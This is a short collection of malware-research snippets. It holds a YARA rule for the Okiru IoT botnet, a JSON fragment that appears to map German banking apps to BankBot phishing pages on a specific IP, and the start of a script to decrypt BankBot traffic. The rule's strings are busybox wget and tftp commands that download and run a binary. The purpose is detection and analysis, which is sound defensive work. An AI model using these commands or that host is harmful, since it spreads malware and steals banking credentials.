azurda

rule Okiru : arm7 {
  	meta:
	    date = "11.12.2017"
	    description = "Ruleset to detect the Okiru IoT malware based on the ARMv7 version found." 
	strings:
		$busy_1 = "/bin/busybox cp /bin/busybox %s; /bin/busybox cp /bin/busybox %s; >%s; >%s; /bin/busybox chmod 777 %s %s"
		$busy_2 = "/bin/busybox cp /bin/busybox %s; >%s; /bin/busybox chmod 777 %s"
		$busy_3 = "/bin/busybox wget http://%d.%d.%d.%d:%d/fahwrzadws/okiru.%s -O -> %s; /bin/busybox chmod 777 %s; ./%s; >%s"
		$busy_4 = "/bin/busybox tftp -r okiru.%s -l %s -g %d.%d.%d.%d; /bin/busybox chmod 777 %s; ./%s; >%s"
		$busy_5 = "/bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'"

azurda

[{
	"to": "com.db.mm.deutschebank",
	"body": "http://188.209.49.198/777/l/05.php"
}, {
	"to": "de.commerzbanking.mobil",
	"body": " http://188.209.49.198/777/l/06.php"
}, {
	"to": "com.ing.diba.mbbr2",
	"body": " http://188.209.49.198/777/l/13.php"
}, {

azurda

import sys
import urllib 

__author__ = 'fdiaz@hispasec.com'

""" Script to decrypt bankbot communications 
	argv[1] = key 
	argv[2] = encrypted string
    Example: 
    	decrypter.py "qwe" "5w wqq 98 5w 49 wqe 5e 5q 48 48 wqe 98 97 55 53 53 37 5w 65 49 37 5w 65 48"